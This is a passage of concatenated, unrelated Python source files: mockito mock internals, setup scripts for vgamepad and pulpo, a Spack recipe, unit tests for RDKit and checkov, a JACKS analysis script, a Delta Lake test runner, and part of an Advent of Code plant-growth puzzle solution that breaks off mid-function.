new_mocked_method.__wrapped__ = original_method # type: ignore[attr-defined] # noqa: E501
try:
new_mocked_method.__module__ = original_method.__module__
except AttributeError:
pass
if inspect.ismethod(original_method):
new_mocked_method = utils.newmethod(
new_mocked_method, self.mocked_obj
)
if isinstance(original_method, staticmethod):
new_mocked_method = staticmethod(new_mocked_method) # type: ignore[assignment] # noqa: E501
elif isinstance(original_method, classmethod):
new_mocked_method = classmethod(new_mocked_method) # type: ignore[assignment] # noqa: E501
elif (
inspect.isclass(self.mocked_obj)
and inspect.isclass(original_method) # TBC: Inner classes
):
new_mocked_method = staticmethod(new_mocked_method) # type: ignore[assignment] # noqa: E501
self.set_method(method_name, new_mocked_method)
def stub(self, method_name):
try:
self.original_methods[method_name]
except KeyError:
original_method, was_in_spec = self.get_original_method(
method_name)
if was_in_spec:
# This indicates the original method was found directly on
# the spec object and should therefore be restored by unstub
self.original_methods[method_name] = original_method
else:
self.original_methods[method_name] = None
self.replace_method(method_name, original_method)
def forget_stubbed_invocation(self, invocation):
assert invocation in self.stubbed_invocations
if len(self.stubbed_invocations) == 1:
mock_registry.unstub(self.mocked_obj)
return
self.stubbed_invocations.remove(invocation)
if not any(
inv.method_name == invocation.method_name
for inv in self.stubbed_invocations
):
original_method = self.original_methods.pop(invocation.method_name)
self.restore_method(invocation.method_name, original_method)
def restore_method(self, method_name, original_method):
# If original_method is None, we *added* it to mocked_obj, so we
# must delete it here.
# If we mocked an instance, our mocked function will actually hide
# the one on its class, so we delete as well.
if (
not original_method
or not inspect.isclass(self.mocked_obj)
and inspect.ismethod(original_method)
):
delattr(self.mocked_obj, method_name)
else:
self.set_method(method_name, original_method)
def unstub(self):
while self.original_methods:
method_name, original_method = self.original_methods.popitem()
self.restore_method(method_name, original_method)
# SPECCING
def has_method(self, method_name):
if self.spec is None:
return True
return hasattr(self.spec, method_name)
def get_signature(self, method_name):
if self.spec is None:
return None
try:
return self._signatures_store[method_name]
except KeyError:
sig = signature.get_signature(self.spec, method_name)
self._signatures_store[method_name] = sig
return sig
class _OMITTED(object):
def __repr__(self):
return 'OMITTED'
OMITTED = _OMITTED()
def mock(config_or_spec=None, spec=None, strict=OMITTED):
"""Create 'empty' objects ('Mocks').
Will create an empty unconfigured object, that you can pass
around. All interactions (method calls) will be recorded and can be
verified using :func:`verify` et.al.
A plain `mock()` will be not `strict`, and thus all methods regardless
of the arguments will return ``None``.
.. note:: Technically all attributes will return an internal interface.
Because of that a simple ``if mock().foo:`` will surprisingly pass.
If you set strict to ``True``: ``mock(strict=True)`` all unexpected
interactions will raise an error instead.
You configure a mock using :func:`when`, :func:`when2` or :func:`expect`.
You can also very conveniently just pass in a dict here::
response = mock({'text': 'ok', 'raise_for_status': lambda: None})
You can also create an empty Mock which is specced against a given
`spec`: ``mock(requests.Response)``. These mock are by default strict,
thus they raise if you want to stub a method, the spec does not implement.
Mockito will also match the function signature.
You can pre-configure a specced mock as well::
response = mock({'json': lambda: {'status': 'Ok'}},
spec=requests.Response)
Mocks are by default callable. Configure the callable behavior using
`when`::
dummy = mock()
when(dummy).__call__(1).thenReturn(2)
All other magic methods must be configured this way or they will raise an
AttributeError.
See :func:`verify` to verify your interactions after usage.
"""
if type(config_or_spec) is dict:
config = config_or_spec
else:
config = {}
spec = config_or_spec
if strict is OMITTED:
strict = False if spec is None else True
class Dummy(_Dummy):
if spec:
__class__ = spec # make isinstance work
def __getattr__(self, method_name):
if strict:
__tracebackhide__ = operator.methodcaller(
"errisinstance", AttributeError
)
raise AttributeError(
"'Dummy' has no attribute %r configured" % method_name)
return functools.partial(
remembered_invocation_builder, theMock, method_name)
def __repr__(self):
name = 'Dummy'
if spec:
name += spec.__name__
return "<%s id=%s>" % (name, id(self))
# That's a tricky one: The object we will return is an *instance* of our
# Dummy class, but the mock we register will point and patch the class.
# T.i. so that magic methods (`__call__` etc.) can be configured.
obj = Dummy()
theMock = Mock(Dummy, strict=strict, spec=spec)
for n, v in config.items():
if inspect.isfunction(v):
invocation.StubbedInvocation(theMock, n)(Ellipsis).thenAnswer(v)
else:
setattr(Dummy, n, v)
mock_registry.register(obj, theMock)
return obj
|
the-stack_106_30573 | from setuptools import setup, find_packages
import platform
from pathlib import Path
import subprocess
import sys
import warnings
assert platform.system() == 'Windows', "Sorry, this module is only compatible with Windows so far."
archstr = platform.machine()
if archstr.endswith('64'):
arch = "x64"
elif archstr.endswith('86'):
arch = "x86"
else:
if platform.architecture()[0] == "64bit":
arch = "x64"
else:
arch = "x86"
warnings.warn(f"vgamepad could not determine your system architecture: \
the vigembus installer will default to {arch}. If this is not your machine architecture, \
please cancel the upcoming vigembus installation and install vigembus manually from \
https://github.com/ViGEm/ViGEmBus/releases/tag/setup-v1.17.333")
pathMsi = Path(__file__).parent.absolute() / "vgamepad" / "win" / "vigem" / "install" / arch / ("ViGEmBusSetup_" + arch + ".msi")
# Prompt installation of the ViGEmBus driver (blocking call)
if sys.argv[1] != 'egg_info' and sys.argv[1] != 'sdist':
subprocess.call('msiexec /i %s' % str(pathMsi), shell=True)
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name='vgamepad',
packages=[package for package in find_packages()],
version='0.0.5',
license='MIT',
description='Virtual XBox360 and DualShock4 gamepads in python',
long_description=long_description,
long_description_content_type="text/markdown",
author='Yann Bouteiller',
url='https://github.com/yannbouteiller/vgamepad',
download_url='https://github.com/yannbouteiller/vgamepad/archive/refs/tags/v0.0.5.tar.gz',
keywords=['virtual', 'gamepad', 'python', 'xbox', 'dualshock', 'controller', 'emulator'],
install_requires=[],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Education',
'Intended Audience :: Information Technology',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Operating System :: Microsoft :: Windows',
'Programming Language :: Python',
'Topic :: Software Development :: Build Tools',
'Topic :: Games/Entertainment',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
],
package_data={'vgamepad': [
'win/vigem/client/x64/ViGEmClient.dll',
'win/vigem/client/x86/ViGEmClient.dll',
'win/vigem/install/x64/ViGEmBusSetup_x64.msi',
'win/vigem/install/x86/ViGEmBusSetup_x86.msi',
]}
)
|
the-stack_106_30574 | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Libnetworkit(CMakePackage):
"""NetworKit is a growing open-source toolkit for large-scale network
analysis. Its aim is to provide tools for the analysis of large networks
in the size range from thousands to billions of edges. For this purpose,
it implements efficient graph algorithms, many of them parallel to
utilize multicore architectures. These are meant to compute standard
measures of network analysis, such as degree sequences, clustering
coefficients, and centrality measures. In this respect, NetworKit is
comparable to packages such as NetworkX, albeit with a focus on
parallelism and scalability."""
homepage = "https://networkit.github.io/"
url = "https://github.com/networkit/networkit/archive/6.1.tar.gz"
maintainers = ['fabratu']
version('7.0', sha256='4faf16c5fae3e14d3c1b6f30e25c6e093dcf6a3dbf021235f3161ac2a527f682')
version('6.1', sha256='22c953ea1054c356663b31c77114c2f0c8fec17e0e707aeec23026241beab9b2')
    variant('static', default=False, description='Enables the build of static libraries')
variant('doc', default=False, description='Enables the build with sphinx documentation')
depends_on('libtlx')
depends_on('py-sphinx', when='+doc', type='build')
patch('0001-Name-agnostic-import-of-tlx-library.patch', when='@6.1')
def cmake_args(self):
spec = self.spec
tlx_libs = spec['libtlx'].prefix
args = ['-DNETWORKIT_EXT_TLX=%s' % tlx_libs,
'-DNETWORKIT_STATIC=%s' %
('ON' if '+static' in spec else 'OFF')]
return args
|
the-stack_106_30575 | #
# Copyright (C) 2001 greg Landrum
#
""" unit testing code for the descriptor COM server
"""
from __future__ import print_function
from rdkit import RDConfig
import unittest
import Parser
from win32com.client import Dispatch
from Numeric import *
class TestCase(unittest.TestCase):
def setUp(self):
print('\n%s: '%self.shortDescription(),end='')
def testConnect(self):
" testing connection "
ok = 1
try:
c = Dispatch('RD.DescCalc')
except:
ok = 0
assert ok and c is not None, 'connection to COM server failed'
def testLoad(self):
" testing load "
c = Dispatch('RD.DescCalc')
ok = 1
try:
c.LoadCalculator(RDConfig.RDCodeDir+'/ml/descriptors/test_data/ferro.dsc')
except:
ok = 0
assert ok, 'LoadCalculator failed'
def testNames(self):
" testing GetDescriptorNames "
c = Dispatch('RD.DescCalc')
c.LoadCalculator(RDConfig.RDCodeDir+'/ml/descriptors/test_data/ferro.dsc')
names = c.GetDescriptorNames()
expectedNames = ('MAX_DED','has3d','has4d','has5d','elconc','atvol')
assert names==expectedNames, 'GetDescriptorNames failed (%s != %s)'%(repr(names),
repr(expectedNames))
def testCalc(self):
" testing descriptor calculation "
argV = ['CrPt3','fcc','AuCu3',58.09549962,1,4,0.228898,8.876,1]
nameV = ['Compound','Structure','Structure_Type','Volume',
'Z','Atoms_per_Formula_Unit','Hardness','RawDOS_Ef',
'IsFerromagnetic']
c = Dispatch('RD.DescCalc')
c.LoadCalculator(RDConfig.RDCodeDir+'/ml/descriptors/test_data/ferro.dsc')
ok = 1
descVect = array(c.CalcDescriptors(argV,nameV))
expected = array((3.67481803894, 1, 0, 1, 0.619669341609, 14.523874905))
diffV = abs(descVect-expected)
assert ok, 'CalcDescriptors failed'
assert max(diffV)<0.0001,'bad descriptors: %s, %s'%(str(expected),str(descVect))
def TestSuite():
suite = unittest.TestSuite()
suite.addTest(TestCase('testConnect'))
suite.addTest(TestCase('testLoad'))
suite.addTest(TestCase('testNames'))
suite.addTest(TestCase('testCalc'))
return suite
if __name__ == '__main__':
suite = TestSuite()
unittest.TextTestRunner().run(suite)
|
the-stack_106_30579 | import unittest
from checkov.terraform.parser import Parser
from checkov.terraform.evaluation.evaluation_methods.const_variable_evaluation import ConstVariableEvaluation
from checkov.terraform.context_parsers.registry import parser_registry
import dpath.util
import os
class TestConstVariableEvaluation(unittest.TestCase):
def setUp(self):
test_root_dir = os.path.dirname(os.path.realpath(__file__)) + '/resources/default_evaluation'
tf_definitions = {}
parsing_errors = {}
Parser().hcl2(directory=test_root_dir, tf_definitions=tf_definitions, parsing_errors=parsing_errors)
for definition in tf_definitions.items():
definitions_context = parser_registry.enrich_definitions_context(definition)
variable_evaluator = ConstVariableEvaluation(test_root_dir, tf_definitions, definitions_context)
variable_evaluator.evaluate_variables()
self.tf_definitions = variable_evaluator.tf_definitions
self.definitions_context = variable_evaluator.definitions_context
def test_evaluate_variables(self):
self.assertEqual(
dpath.get(self.tf_definitions[
os.path.dirname(os.path.realpath(__file__)) + '/resources/default_evaluation/main.tf'],
'resource/0/aws_cognito_user_group/user_group/name/0'),
'Pavel_Checkov_group')
def test__extract_context_path(self):
path = 'resource/0/aws_cognito_user_group/user_group/name/0'
self.assertEqual(ConstVariableEvaluation._extract_context_path(path),
('resource/aws_cognito_user_group/user_group', 'name'))
def test_all_expressions_evaluated(self):
self.assertEqual(
len(dpath.get(self.definitions_context[
os.path.dirname(os.path.realpath(__file__)) + '/resources/default_evaluation/main.tf'],
'evaluations/dummy_1/definitions')),
2)
def tearDown(self):
parser_registry.definitions_context = {}
if __name__ == '__main__':
unittest.main()
|
the-stack_106_30581 | import io, os, csv, random, logging
from jacks.infer import LOG
from jacks.jacks_io import createGeneSpec, createSampleSpec, getJacksParser, collateTestControlSamples, writeJacksWResults
from jacks.preprocess import loadDataAndPreprocess
import scipy as SP
def infer_JACKS_meanfc(gene_index, testdata, ctrldata):
results = {}
for gene in gene_index:
Ig = gene_index[gene]
y = (testdata[Ig,:,0] - ctrldata[Ig,:,0])
w1 = SP.nanmean(y,axis=0)
results[gene] = (y,-1.0,-1.0,-1.0,w1,-1.0)
return results
LOG.setLevel(logging.WARNING)
parser = getJacksParser()
args = parser.parse_args()
outprefix = args.outprefix
if '/' in outprefix and not os.path.exists(os.path.dirname(outprefix)): os.makedirs(os.path.dirname(outprefix))
outfile_w = outprefix + '_gene_results.txt'
outfile_w2 = outprefix + '_genestd_results.txt'
# Load the specification of samples to include
LOG.info('Loading sample specification')
sample_spec, ctrl_spec, sample_num_reps = createSampleSpec(args.countfile, args.replicatefile, args.rep_hdr,
args.sample_hdr, args.common_ctrl_sample, args.ctrl_sample_hdr)
# Load the mappings from guides to genes
LOG.info('Loading gene mappings')
gene_spec = createGeneSpec(args.guidemappingfile, args.sgrna_hdr, args.gene_hdr)
# Load the data and preprocess
LOG.info('Loading data and pre-processing')
data, meta, sample_ids, genes, gene_index = loadDataAndPreprocess(sample_spec, gene_spec)
gene_grnas = {gene: [x for x in meta[gene_index[gene], 0]] for gene in gene_index}
#Compute MeanFC for all samples against their controls
LOG.info('Running Single JACKS inference')
testdata, ctrldata, test_sample_idxs = collateTestControlSamples(data, sample_ids, ctrl_spec)
jacks_results = infer_JACKS_meanfc(gene_index, testdata, ctrldata)
# Write out the results
LOG.info('Writing Single JACKS results')
sample_ids_without_ctrl = [sample_ids[idx] for idx in test_sample_idxs]
writeJacksWResults(outprefix, jacks_results, sample_ids_without_ctrl, write_types=[''])
|
the-stack_106_30584 | """Constants for the Ruckus Unleashed integration."""
import logging
DOMAIN = "ruckus_unleashed"
PLATFORMS = ["device_tracker"]
SCAN_INTERVAL = 180
_LOGGER = logging.getLogger(__name__)
COORDINATOR = "coordinator"
UNDO_UPDATE_LISTENERS = "undo_update_listeners"
CLIENTS = "clients"
|
the-stack_106_30585 | import argparse
import os
from kalasanty.data import prepare_dataset
from tfbio.data import Featurizer
from tqdm import tqdm
def input_path(path):
"""Check if input exists."""
path = os.path.abspath(path)
if not os.path.exists(path):
raise IOError('%s does not exist.' % path)
return path
def output_path(path):
"""Check if output file can be created."""
path = os.path.abspath(path)
dirname = os.path.dirname(path)
if not os.access(dirname, os.W_OK):
raise IOError('File %s cannot be created (check your permissions).'
% path)
return path
def parse_args():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--srcDataset', '-s', required=True, type=input_path,
help='path to the source database')
parser.add_argument('--destDataset', '-d', required=True, type=input_path,
help='path to the processed database')
parser.add_argument('--include', '-i', type=input_path, nargs='*',
help='text file with IDs to use (each in separate line). '
'If not specified, all proteins in the database '
'(except those listed with --exclude) will be used. '
'Note that --exclude has higher priority (i.e. if '
'ID is specified with both -e and -i it will be skipped)')
parser.add_argument('--exclude', '-e', type=input_path, nargs='*',
help='text file with IDs to skip (each in separate line). '
'It has higher priority than --include (i.e. if '
'ID is specified with both -e and -i it will be skipped)')
parser.add_argument('--output', '-o', default='./pockets.hdf', type=output_path,
help='name for the file with the prepared structures')
parser.add_argument('--mode', '-m', default='w',
type=str, choices=['r+', 'w', 'w-', 'x', 'a'],
help='mode for the output file (see h5py documentation)')
parser.add_argument('--db_format', '-f', default='scpdb',
type=str, choices=['scpdb', 'pdbbind','pdbbind2'],
help='way the database is structured - like sc-PDB or '
'like PDBbind (see examples in tests/datasets directory)')
parser.add_argument('--verbose', '-v', action='store_true',
help='whether to print messages')
return parser.parse_args()
def main():
args = parse_args()
blacklist = []
if args.exclude:
for fname in args.exclude:
with open(fname) as f:
blacklist += f.read().split('\n')
if args.include:
all_ids = []
for fname in args.include:
with open(fname) as f:
all_ids += list(filter(None, f.read().split('\n')))
else:
all_ids = os.listdir(args.destDataset)
ids = [i for i in all_ids if i not in blacklist]
if len(ids) == 0:
raise RuntimeError('No data to process (empty list of IDs)')
protein_featurizer = Featurizer(save_molecule_codes=False)
if args.verbose:
print('%s IDs to process' % len(ids))
print('(%s total, %s excluded)' % (len(all_ids), len(blacklist)))
progress_bar = tqdm
else:
progress_bar = None
prepare_dataset(args.srcDataset, args.destDataset, protein_featurizer, ids=ids, db_format=args.db_format,
hdf_path=args.output, hdf_mode=args.mode,
progress_bar=progress_bar, verbose=args.verbose)
if __name__ == '__main__':
main()
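# Example invocation (script name and paths are placeholders; the flags map to
# the argparse options defined above):
#
#   python prepare_dataset.py --srcDataset scPDB/ --destDataset processed/ \
#       --include train_ids.txt --exclude blacklist.txt \
#       --output pockets.hdf --db_format scpdb --verbose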
|
the-stack_106_30586 | """This module implements an operator that acts like an IMU driver when
using the simulator.
The operator attaches an IMU sensor to the ego vehicle, receives
IMU measurements from the simulator, and sends them on its output stream.
"""
import threading
import erdos
from pylot.localization.messages import IMUMessage
from pylot.simulation.utils import get_vehicle_handle, get_world, \
set_simulation_mode
from pylot.utils import Transform, Vector3D
class CarlaIMUDriverOperator(erdos.Operator):
    """Publishes IMU measurements (transform, acceleration, gyro and
compass) from IMU (inertial measurement unit) sensor.
This operator attaches to a vehicle at the required position with respect
to the vehicle, registers callback functions to retrieve the IMU
measurements and publishes it to downstream operators.
Args:
ego_vehicle_id_stream (:py:class:`erdos.ReadStream`): Stream on
which the operator receives the id of the ego vehicle. It uses this
id to get a simulator handle to the vehicle.
imu_stream (:py:class:`erdos.WriteStream`): Stream on which the
operator sends IMU info.
imu_setup (:py:class:`pylot.drivers.sensor_setup.IMUSetup`):
Setup of the IMU sensor.
flags (absl.flags): Object to be used to access absl flags.
"""
def __init__(self, ego_vehicle_id_stream, imu_stream, imu_setup, flags):
self._vehicle_id_stream = ego_vehicle_id_stream
self._imu_stream = imu_stream
        # The operator does not pass watermarks by default.
self._flags = flags
self._logger = erdos.utils.setup_logging(self.config.name,
self.config.log_file_name)
self._imu_setup = imu_setup
# The hero vehicle actor object we obtain from the simulator.
self._vehicle = None
# The IMU sensor actor object we obtain from the simulator.
self._imu = None
# Lock to ensure that the callbacks do not execute simultaneously.
self._lock = threading.Lock()
@staticmethod
def connect(ego_vehicle_id_stream):
imu_stream = erdos.WriteStream()
return [imu_stream]
def process_imu(self, imu_msg):
"""Invoked when an IMU message is received from the simulator.
Sends IMU measurements to downstream operators.
Args:
imu_msg (carla.IMUMeasurement): IMU reading.
"""
game_time = int(imu_msg.timestamp * 1000)
timestamp = erdos.Timestamp(coordinates=[game_time])
watermark_msg = erdos.WatermarkMessage(timestamp)
with erdos.profile(self.config.name + '.process_imu',
self,
event_data={'timestamp': str(timestamp)}):
with self._lock:
msg = IMUMessage(
timestamp,
Transform.from_simulator_transform(imu_msg.transform),
Vector3D.from_simulator_vector(imu_msg.accelerometer),
Vector3D.from_simulator_vector(imu_msg.gyroscope),
imu_msg.compass)
self._imu_stream.send(msg)
# Note: The operator is set not to automatically propagate
# watermarks received on input streams. Thus, we can issue
# watermarks only after the simulator callback is invoked.
self._imu_stream.send(watermark_msg)
def run(self):
# Read the vehicle id from the vehicle id stream
vehicle_id_msg = self._vehicle_id_stream.read()
vehicle_id = vehicle_id_msg.data
self._logger.debug(
"The IMUDriverOperator received the vehicle id: {}".format(
vehicle_id))
# Connect to the world. We connect here instead of in the constructor
# to ensure we're connected to the latest world.
_, world = get_world(self._flags.simulator_host,
self._flags.simulator_port,
self._flags.simulator_timeout)
set_simulation_mode(world, self._flags)
self._vehicle = get_vehicle_handle(world, vehicle_id)
# Install the IMU.
imu_blueprint = world.get_blueprint_library().find('sensor.other.imu')
# Set noise attributes.
imu_blueprint.set_attribute('noise_accel_stddev_x',
str(self._flags.accel_noise_stddev_x))
imu_blueprint.set_attribute('noise_accel_stddev_y',
str(self._flags.accel_noise_stddev_y))
imu_blueprint.set_attribute('noise_accel_stddev_z',
str(self._flags.accel_noise_stddev_z))
imu_blueprint.set_attribute('noise_gyro_stddev_x',
str(self._flags.gyro_noise_stddev_x))
imu_blueprint.set_attribute('noise_gyro_stddev_y',
str(self._flags.gyro_noise_stddev_y))
imu_blueprint.set_attribute('noise_gyro_stddev_z',
str(self._flags.gyro_noise_stddev_z))
if self._flags.simulator_imu_frequency == -1:
imu_blueprint.set_attribute('sensor_tick', '0.0')
else:
imu_blueprint.set_attribute(
'sensor_tick', str(1.0 / self._flags.simulator_imu_frequency))
transform = self._imu_setup.get_transform().as_simulator_transform()
self._logger.debug("Spawning an IMU: {}".format(self._imu_setup))
self._imu = world.spawn_actor(imu_blueprint,
transform,
attach_to=self._vehicle)
# Register the callback on the IMU.
self._imu.listen(self.process_imu)
|
the-stack_106_30587 | from future import standard_library
standard_library.install_aliases()
import os
import sys
import subprocess
try:
    from ConfigParser import ConfigParser  # python 2
except ImportError:
from configparser import ConfigParser # python 3
COMMIT_INFO_FNAME = 'COMMIT_INFO.txt'
def pkg_commit_hash(pkg_path):
''' Get short form of commit hash given directory `pkg_path`
There should be a file called 'COMMIT_INFO.txt' in `pkg_path`. This is a
file in INI file format, with at least one section: ``commit hash``, and two
variables ``archive_subst_hash`` and ``install_hash``. The first has a
substitution pattern in it which may have been filled by the execution of
``git archive`` if this is an archive generated that way. The second is
filled in by the installation, if the installation is from a git archive.
We get the commit hash from (in order of preference):
* A substituted value in ``archive_subst_hash``
    * A written commit hash value in ``install_hash``
* git's output, if we are in a git repository
If all these fail, we return a not-found placeholder tuple
Parameters
----------
pkg_path : str
directory containing package
Returns
-------
hash_from : str
Where we got the hash from - description
hash_str : str
short form of hash
'''
# Try and get commit from written commit text file
pth = os.path.join(pkg_path, COMMIT_INFO_FNAME)
if not os.path.isfile(pth):
raise IOError('Missing commit info file %s' % pth)
cfg_parser = ConfigParser()
cfg_parser.read(pth)
archive_subst = cfg_parser.get('commit hash', 'archive_subst_hash')
if not archive_subst.startswith('$Format'): # it has been substituted
return 'archive substitution', archive_subst
install_subst = cfg_parser.get('commit hash', 'install_hash')
if install_subst != '':
return 'installation', install_subst
# maybe we are in a repository
proc = subprocess.Popen('git rev-parse --short HEAD',
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=pkg_path, shell=True)
repo_commit, _ = proc.communicate()
if repo_commit:
return 'repository', repo_commit.strip()
return '(none found)', '<not found>'
def get_pkg_info(pkg_path):
''' Return dict describing the context of this package
Parameters
----------
pkg_path : str
path containing __init__.py for package
Returns
-------
context : dict
with named parameters of interest
'''
src, hsh = pkg_commit_hash(pkg_path)
import networkx
import nibabel
import numpy
import scipy
import traits
return dict(
pkg_path=pkg_path,
commit_source=src,
commit_hash=hsh,
sys_version=sys.version,
sys_executable=sys.executable,
sys_platform=sys.platform,
numpy_version=numpy.__version__,
scipy_version=scipy.__version__,
networkx_version=networkx.__version__,
nibabel_version=nibabel.__version__,
traits_version=traits.__version__)
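# A minimal usage sketch of the helpers above. The directory passed in is an
# assumption; pkg_commit_hash expects it to contain a COMMIT_INFO.txt roughly
# like the following (values shown are illustrative):
#
#   [commit hash]
#   archive_subst_hash = $Format:%h$
#   install_hash =
def _commit_hash_demo(pkg_path):
    src, hsh = pkg_commit_hash(pkg_path)
    return '%s: %s' % (src, hsh)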
|
the-stack_106_30589 | # ----------------------------------------------------------------------------
# - Open3D: www.open3d.org -
# ----------------------------------------------------------------------------
# The MIT License (MIT)
#
# Copyright (c) 2018-2021 www.open3d.org
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
# ----------------------------------------------------------------------------
"""ICP (Iterative Closest Point) registration algorithm"""
import open3d as o3d
import numpy as np
import copy
def draw_registration_result(source, target, transformation):
source_temp = copy.deepcopy(source)
target_temp = copy.deepcopy(target)
source_temp.paint_uniform_color([1, 0.706, 0])
target_temp.paint_uniform_color([0, 0.651, 0.929])
source_temp.transform(transformation)
o3d.visualization.draw([source_temp, target_temp])
def point_to_point_icp(source, target, threshold, trans_init):
print("Apply point-to-point ICP")
reg_p2p = o3d.pipelines.registration.registration_icp(
source, target, threshold, trans_init,
o3d.pipelines.registration.TransformationEstimationPointToPoint())
print(reg_p2p)
print("Transformation is:")
print(reg_p2p.transformation, "\n")
draw_registration_result(source, target, reg_p2p.transformation)
def point_to_plane_icp(source, target, threshold, trans_init):
print("Apply point-to-plane ICP")
reg_p2l = o3d.pipelines.registration.registration_icp(
source, target, threshold, trans_init,
o3d.pipelines.registration.TransformationEstimationPointToPlane())
print(reg_p2l)
print("Transformation is:")
print(reg_p2l.transformation, "\n")
draw_registration_result(source, target, reg_p2l.transformation)
if __name__ == "__main__":
pcd_data = o3d.data.DemoICPPointClouds()
source = o3d.io.read_point_cloud(pcd_data.paths[0])
target = o3d.io.read_point_cloud(pcd_data.paths[1])
threshold = 0.02
trans_init = np.asarray([[0.862, 0.011, -0.507, 0.5],
[-0.139, 0.967, -0.215, 0.7],
[0.487, 0.255, 0.835, -1.4], [0.0, 0.0, 0.0, 1.0]])
draw_registration_result(source, target, trans_init)
print("Initial alignment")
evaluation = o3d.pipelines.registration.evaluate_registration(
source, target, threshold, trans_init)
print(evaluation, "\n")
point_to_point_icp(source, target, threshold, trans_init)
point_to_plane_icp(source, target, threshold, trans_init)
|
the-stack_106_30592 | from setuptools import find_packages, setup
import sys
CORE_REQUIREMENTS = [
'numpy>=1.18.0, <1.18.99',
'six>=1.14, <1.14.99',
'future>=0.18.0, <0.18.99'
]
if sys.version_info < (3, 7):
REQUIRES = CORE_REQUIREMENTS + ["dataclasses"]
else:
REQUIRES = CORE_REQUIREMENTS
with open('README.md') as f:
long_description = f.read()
setup(
name='pulpo',
version='0.0.1',
setup_cfg=True,
python_requires='~=3.6',
packages=find_packages(where='.'),
long_description=long_description,
long_description_content_type='text/markdown',
setup_requires=['setuptools>=39.1.0'],
url='https://github.com/pm3310/pulpo',
install_requires=REQUIRES,
test_suite='tests',
zip_safe=True
)
|
the-stack_106_30594 | #!/usr/bin/env python
#
# Copyright (2021) The Delta Lake Project Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import subprocess
from os import path
def run_sbt_tests(root_dir):
print("##### Running SBT tests #####")
sbt_path = path.join(root_dir, path.join("build", "sbt"))
run_cmd([sbt_path, "clean", "test"], stream_output=True)
def run_python_tests(root_dir):
print("##### Running Python tests #####")
python_test_script = path.join(root_dir, path.join("python", "run-tests.py"))
print("Calling script %s", python_test_script)
run_cmd(["python", python_test_script], stream_output=True)
def run_cmd(cmd, throw_on_error=True, env=None, stream_output=False, **kwargs):
cmd_env = os.environ.copy()
if env:
cmd_env.update(env)
if stream_output:
child = subprocess.Popen(cmd, env=cmd_env, **kwargs)
exit_code = child.wait()
if throw_on_error and exit_code != 0:
raise Exception("Non-zero exitcode: %s" % (exit_code))
return exit_code
else:
child = subprocess.Popen(
cmd,
env=cmd_env,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
**kwargs)
(stdout, stderr) = child.communicate()
exit_code = child.wait()
        if throw_on_error and exit_code != 0:
raise Exception(
"Non-zero exitcode: %s\n\nSTDOUT:\n%s\n\nSTDERR:%s" %
(exit_code, stdout, stderr))
return (exit_code, stdout, stderr)
if __name__ == "__main__":
if os.getenv("USE_DOCKER") is not None:
prepare_docker_img = ["docker", "build", "--tag=pydeltalake", "."]
run_cmd(prepare_docker_img, stream_output=True)
# JENKINS_URL is passed here so that the Docker container
# can be in line with Jenkins build behavior(usage of sbt sources)
cmd = ["docker", "run", "-e", "JENKINS_URL",
"-e", "SBT_1_5_5_MIRROR_JAR_URL", "pydeltalake:latest"]
run_cmd(cmd, stream_output=True)
else:
root_dir = os.path.dirname(os.path.dirname(__file__))
run_sbt_tests(root_dir)
run_python_tests(root_dir)
|
the-stack_106_30596 | SHIFT = 10
def parse_init(line):
return [c == '#' for c in line[15:].strip()]
def parse_rules(lines):
rules = []
for line in lines:
if line[9] == '#':
rules.append([c == '#' for c in line[:5]])
return rules
def calculate_next_state(state, rules):
# experimentally we never need to increase the size
# of the array on the left, which makes it easier
if sum(state[-5:]):
        state = state + [False] * 10  # increase on the right if needed
next_state = []
for i in range(len(state)):
if i < 2 or i > len(state) - 3:
next_state += [False]
else:
next_state += [state[i-2:i+3] in rules]
return next_state
def sum_plants(state):
total = 0
for i in range(len(state)):
if state[i] == 1:
total += i - SHIFT
return total
def calculate_positions(state):
pos_absolute = []
for i in range(len(state)):
if state[i]:
pos_absolute += [i]
return [pos - pos_absolute[0] for pos in pos_absolute]
def process(init, rules, generations):
last_state = [False] * SHIFT + init + [False] * SHIFT
history = [last_state]
position_founds = [calculate_positions(last_state)]
for i in range(generations):
last_state = calculate_next_state(last_state, rules)
history += [last_state]
new_pos = calculate_positions(last_state)
if new_pos == position_founds[-1]:
# we found a pattern that shifts itself from a step to the next
# we do not need to process all steps, just to find the final shift
curr_sum = sum_plants(last_state)
prev_sum = sum_plants(history[-2])
diff = curr_sum - prev_sum
return curr_sum + diff * (generations - (i + 1))
position_founds += [new_pos]
# this will not be reached for a big generations value
# we rely on the fact that we will find a pattern shifting iteself
return sum_plants(last_state)
def compute(file_name):
with open(file_name, "r") as file:
